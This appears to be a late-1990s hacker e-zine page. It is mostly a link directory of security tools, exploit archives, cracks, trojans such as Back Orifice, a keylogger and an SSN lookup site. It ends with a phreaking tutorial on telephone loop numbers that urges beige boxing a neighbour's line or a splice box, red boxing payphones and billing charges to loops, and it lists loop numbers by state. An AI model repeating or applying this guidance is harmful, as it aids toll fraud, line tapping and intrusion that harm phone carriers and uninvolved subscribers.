Systems È See document: http://www.crime-freesecurity.com/ + Unix o http://www.users.fast.net/ È See document: http://www.users.fast.net/ o http://w56.ml.org/ È See document: http://w56.ml.org/ * App + WatchDog Software (unix) È See document: http://www.infstream.com/ + Reporting Software È See document: http://www.notify.com/audit.htm + Netsuite Professional Audit Sotware È See document: http://www.netsuite.com/cgi/template.pl/site/products/index. html + NDG Software's È See document: http://www.comsecltd.com/archive/ndgfile.html + aelita enterprise suite È See document: http://www.ntsecurity.com/Products/index.html + SeNTry - the Enterprise Event Manager È See document: http://www.missioncritical.com/product/list.htm + The MerzScope Sampler È See document: http://www.merzcom.com/prod/scop/sampler.html + Hackershield È See document: https://secure.interlog.com/netect/hsblform.htm + T-sight È See document: http://www.engarde.com/software/t-sight/index.html + NTManage v2.08 È See document: http://www.lanware.net/download/ + Forensic and Security Software È See document: http://www.secure-data.com/tools.html + Site Manager Software È See document: http://194.87.208.92/product/bay/network/site.htm + RealSecure Software È See document: http://www.iss.net/prod/rs.html + Shadoware - Real-Time Network Security Monitoring È See document: http://www.intrusion.com + Kane Security Analyst Software È See document: http://www.intrusion.com/product.htm [ruler.gif] Tools * Vulnerability Track + http://www.ntsecurity.net/ È See document: http://www.ntsecurity.net/ + http://www.geek-girl.com/bugtraq/search.html È See document: http://www.geek-girl.com/bugtraq/search.html + http://www.cert.org/ È See document: http://www.cert.org/ + http://www.insecure.org/ È See document: http://www.insecure.org/ + http://www.iss.net/xforce/ È See document: http://www.iss.net/xforce/ + Exploit Track È See document: http://www.geek-girl.com/bugtraq/search.html + Vulnerability engine È See document: http://www.infilsec.com/cgi-infilsec/if?action=search? * Crackz + http://bmh.underboss.com/cracks.html È See document: http://bmh.underboss.com/cracks.html * Registry + NT Registry Hack È See document: http://www.jsiinc.com/reghack.htm + Registry Tips Very Good È See document: http://www.regedit.com/Security/Restrictions_and_Policies/ + Win 95 Reg Hack È See document: http://www.cnet.com/Content/Features/Howto/Hacks/index.html * OnLine Tools + Hacker Home Page È See document: http://www.cyberarmy.com/ + Nice serach for Hackers È See document: http://ww2.hitbox.com/ + Get NT user and Group List Using IE È See document: http://209.146.229.2/NTSecurity/default.asp + FTP Fast È See document: http://ftpsearch.ntnu.no/ + Find People anywhere È See document: http://www.worldpages.com/reshome.html/ + Get a social number USA È See document: http://kadima.com/ + World Page È See document: http://www.worldpages.com + Search for Any domain È See document: http://www.alldomains.com/ + Whois Server o telnet://whois.internic.net/ È See document: telnet://whois.internic.net/ o telnet://nic.ddn.mil 43 È See document: telnet://nic.ddn.mil 43 + Word list all lang È See document: ftp://sable.ox.ac.uk/pub/wordlists + Nameserver Lookup È See document: http://jos.net/projects/nslookup4WWW/nslookup4WWW.html * List 1 + http://www.fortrex.com/trn_hacker_tools.htm È See document: http://www.fortrex.com/trn_hacker_tools.htm + Windows NT Web Server Tools È See document: http://www.interlacken.com/winnt/ntwebsrv.htm + Information Security Resource È See document: http://www.sabernet.net/ + Script page È See document: http://worldwidemart.com/scripts/ + http://www.hackersclub.com/km/library È See document: http://www.hackersclub.com/km/library + http://www.apbonline.com/gfiles/ È See document: http://www.apbonline.com/gfiles/ + http://www.jabukie.com/ È See document: http://www.jabukie.com/ + Hackers Hall Of Fame È See document: http://eagle2.online.discovery.com/area/technology/hackers/h ackers.html + http://www.thecodex.com/hacking.html È See document: http://www.thecodex.com/hacking.html + http://www.sysone.demon.co.uk/newhack.htm È See document: http://www.sysone.demon.co.uk/newhack.htm + http://www.bikkel.com/~demoniz/ È See document: http://www.bikkel.com/~demoniz/ + Team 2600 MAC Hacking È See document: http://cyberpunkz.com/team2600/products.html + Stealth Keyboard Interceptor È See document: http://www.fortunecity.com/skyscraper/cache/426/key_log.html + Snadboy's Revelation È See document: http://www.snadboy.com/Revelation.shtml + SATAN Unix È See document: http://www.cs.ruu.nl/cert-uu/satan.html + L0pht Crack È See document: http://www.l0pht.com/l0phtcrack/ + IP Spoofing È See document: http://ryanspc.com/ipspoof.html + Trojan Like Bo È See document: http://hax0r.to/deept/ + Back Orifice È See document: http://www.cultdeadcow.com/tools/ + Collection of hacking CDROM È See document: http://www.hackershomepage.com/section7.htm + Hacking CD È See document: http://members.xoom.com/hackingcd/smallcd.htm + Hacker Gold CDROM È See document: http://www.hackerscatalog.com/hackgold.htm + Hackershield È See document: https://secure.interlog.com/netect/hsblform.htm + http://ds.dial.pipex.com/legends/ È See document: http://ds.dial.pipex.com/legends/ + United Hackers Association È See document: http://205.237.55.207/ + http://www.hackcanada.com/ È See document: http://www.hackcanada.com/ + http://rhino9.ml.org/ È See document: http://rhino9.ml.org/ + http://www.genocide2600.com/~tattooman/ADM/ È See document: http://www.genocide2600.com/~tattooman/ADM/ + http://www.insecure.org/nmap/ È See document: http://www.insecure.org/nmap/ + http://bewoner.dma.be/clan/ È See document: http://bewoner.dma.be/clan/ + Linux Project Personal Page Check Often È See document: http://www.cri.cz/kra/index.html + Hacking NT Tools È See document: http://www.kull.ch/Bauersachs/cracknt_e.asp + tHe w1ck3d k1nGs È See document: http://members.xoom.com/SOSSEC/frames.html + The United Council È See document: http://www.unitedcouncil.org/ + Hacking Tools & Virus È See document: http://home.bip.net/ttorp/enter.html + Hacker Club È See document: http://hackersclub.com/km/files/ + Hide Away È See document: http://www.hideaway.net/ + http://underground.org È See document: http://underground.org + http://www.phrack.com È See document: http://www.phrack.com + http://www.subz3ro.com/ È See document: http://www.subz3ro.com/ + 901 check in the future È See document: http://www.901.org/files.html + Good site must check often È See document: http://www.fortunecity.com/skyscraper/quantum/488/KiNdReD.ht ml + Check Often Phreak and Hack È See document: http://www.johnhead.demon.nl/frames.htm + WebFringe Hacker Web Links È See document: http://www.webfringe.com/top100/?progen + Microsoft hack files È See document: ftp://ftp.technotronic.com/microsoft/ + http://www.2600.com/beyondhope/ È See document: http://www.2600.com/beyondhope/ + http://www.brd.ie/papers/ È See document: http://www.brd.ie/papers/ + Magazine 2600 Underground Informer + Unix http://www.squirrel.com/squirrel/index.html http://www.users.fast.net/ * List 2 + http://www.chez.com/rekcah/ È See document: http://www.chez.com/rekcah/ + http://www.altern.org/snem1/frames/ È See document: http://www.altern.org/snem1/frames/ + http://www.hackersntrackers.com/ È See document: http://www.hackersntrackers.com/ + http://membres.tripod.fr/Hackito/Newtaz.html È See document: http://membres.tripod.fr/Hackito/Newtaz.html + Active Matrix's Hideaway È See document: http://www.hideaway.net/ + http://www.clic.net/~hello/puppet/ È See document: http://www.clic.net/~hello/puppet/ * Exploits and Search + http://www.geek-girl.com/bugtraq/search.html È See document: http://www.geek-girl.com/bugtraq/search.html + http://www.genocide2600.com/~tattooman/index.shtml È See document: http://www.genocide2600.com/~tattooman/index.shtml + http://www.pulhas.org/exploits/ È See document: http://www.pulhas.org/exploits/ + http://www.hackcity.com/ È See document: http://www.hackcity.com/ + http://www.real-secure.org/security/exploits/ È See document: http://www.real-secure.org/security/exploits/ + http://www.antioffline.com/ È See document: http://www.antioffline.com/ + http://www.macroshaft.org/noie.html È See document: http://www.macroshaft.org/noie.html + http://www.securitysearch.net/ È See document: http://www.securitysearch.net/ + http://adm.freelsd.net/ È See document: http://adm.freelsd.net/ + http://www.undersec.com/ È See document: http://www.undersec.com/ + http://www.raza-mexicana.org È See document: http://www.raza-mexicana.org + http://www.arctik.com È See document: http://www.arctik.com + http://personales.mundivia.es/sneaker È See document: http://personales.mundivia.es/sneaker + http://homocyberian.cjb.net È See document: http://homocyberian.cjb.net + http://719.cjb.net È See document: http://719.cjb.net + http://www.sekure.org/english/index.html È See document: http://www.sekure.org/english/index.html + http://www.cybermedia.co.in/hotnews.htm È See document: http://www.cybermedia.co.in/hotnews.htm + http://www.securiteam.com/ È See document: http://www.securiteam.com/ + http://www.ntsecurity.net/ È See document: http://www.ntsecurity.net/ + http://www.networkcommand.com/ È See document: http://www.networkcommand.com/ + http://www.attrition.org/errata/ È See document: http://www.attrition.org/errata/ + http://www.ciac.org/ È See document: http://www.ciac.org/ + http://www.eeye.com/index.html È See document: http://www.eeye.com/index.html + http://www.alternetive.asso.fr/securite/securiteSoft.htm È See document: http://www.alternetive.asso.fr/securite/securiteSoft.htm + http://www.insecure.org/ È See document: http://www.insecure.org/ + http://www.iss.net/xforce/ È See document: http://www.iss.net/xforce/ + http://www.infilsec.com/cgi-infilsec/if?action=search? È See document: http://www.infilsec.com/cgi-infilsec/if?action=search? + http://www.nmrc.org/ È See document: http://www.nmrc.org/ + http://www.technotronic.com/ È See document: http://www.technotronic.com/ + http://www.cookiecentral.com/ È See document: http://www.cookiecentral.com/ [ruler.gif] Search * Altavista È See document: http://altavista.digital.com/ * Altavista Translator È See document: http://babelfish.altavista.digital.com/ * HotBot È See document: http://hotbot.com * DogPile È See document: http://www.dogpile.com/ * 12 Serach Engine In One È See document: http://www.800go.com/800go.html * Deja News È See document: http://www.dejanews.com/ * Handilinks È See document: http://www.handilinks.com/ * Find People Kadima È See document: http://kadima.com/ * World Yellow Pages È See document: http://www.worldpages.com/reshome.html/ * World Yellow Pages È See document: http://www.worldpages.com * http://www.800go.com/800go.html È See document: http://www.800go.com/800go.html * Support Microsoft È See document: http://support.microsoft.com/support/search/c.asp? * Security Serach Engine È See document: http://www.securitysearch.net/ * Country + Canada 411 È See document: http://canada411.sympatico.ca/index.html + St-Bruno È See document: http://www.pageweb.qc.ca/st-bruno/default.htm [ruler.gif] News * http://www.hackernews.com/ È See document: http://www.hackernews.com/ * http://www.infowar.com/hacker/hacker.html-ssi È See document: http://www.infowar.com/hacker/hacker.html-ssi * Hacked SiteArchives of hacked sites È See document: http://www.onething.com/archive/ * New Dimension archive hacked È See document: http://www.newdimensions.net/hacktrash.htm * AntiOnline archive of hacked È See document: http://www.antionline.com/archives/pages/ * http://www.wired.com/ È See document: http://www.wired.com/ * http://innerpulse.com/ È See document: http://innerpulse.com/ * www.innerpulsewwwboard.com È See document: http://www.innerpulsewwwboard.com * http://www.innerpulsehacks.com È See document: http://www.innerpulsehacks.com * News Group + news://alt.security È See document: news://alt.security + news://comp.security.announce È See document: news://comp.security.announce + List of Security List Servers È See document: ListServer.htm * Magazine + Virus 40HEX È See document: http://www.eff.org/pub/Publications/CuD/ + Safer Magazine È See document: http://www.siamrelay.com/ * Dokumentation des Chaos È See document: http://presse.ccc.de/ * http://www.sans.org/digest.htm È See document: http://www.sans.org/digest.htm [-------------------------------------] kv[14]; /* Intro to Loops.....................................hitman */ $Intro.$ Loop numbers can be found in all area codes and are made up primarily of two phone numbers which are usually consectitive. ex; 201-376-9929 201-376-9930 (actual working loop number in NJ) The two numbers are connected and have a constant on hook voltage. If you called the lower number and your buddy phreak called the higher number you would be instantly connected! Sorta like a conference table.(which mah boy error explains about it in a issue of A9F4) Any way you will know if you are on one of the two is if you either hear silence or a loud tone.(100hz)This is the low number,(through dozens of tests) if you hear a low beep then you on the higher number. $The Fun Begins...$ I know by know you are wondering what the hell you need a loop number for or how to find one for if not you wouldn't be reading this txt. Having a loop number is one of the numbero uno things a field phreak can have next to a beige/red box. It can offer even more anonymity while talking on the phone. For example, you can either beige box your neighbors TNI or beige box the splice box around the corner and dial one of the numbers and talk to your waiting friend and/or red box a payphone and dial,etc. This is one of the greatest things to have if you want to talk to someone other than an at&t conference number. You can also place charges on the loop.Say for instance you get on a conf. or maybe the operator asks where should you place the charges. Have your friend be on the loop and tell her the number. Maybe not a good idea but wtf. It is very simple but painstakingly hard to scan for loops. One of my tricks is to enter one of your town/cities normal prefixes and then add 99xx/99xX. I got around 5 or 6 out of probably 20 attempts. I'm not too sure of the risks of scanning for loops,plus Bell hasn't mailed me anything yet so i guess its okay. Just don't be dialing all day. Do a few at a time. Just dial three or four random numbers per day and you can make up a wrong number or/me no speak no english story. $In the End...$ Loop numbers can be very fun and useful to anyone who wants the extra stealth when talking about upcoming projects or meetings and the such.But it also has its drawbacks like trying to find Loop Numbers. So i decided to put in a few loop numbers in here from a few npas around the country. Some may work and some may not. That's life,dig it. *****Loop List***** California 213-360-1118 $ 213-365-1118 213-360-1119 $ 213-365-1119 Florida 305-964-9951 $ 305-778-9952 305-778-9951 $ 305-964-9952 Michigan 313-731-9996 $ 313-722-9996 313-731-9997 $ 313-722-9997 New Jersey 201-558-9929 $ 201-992-9929 201-558-9930 $ 201-992-9930 *****Loop List***** [----------thats all folks-------] http://www.underzine.com - An LoU joint..... [www.legions.org]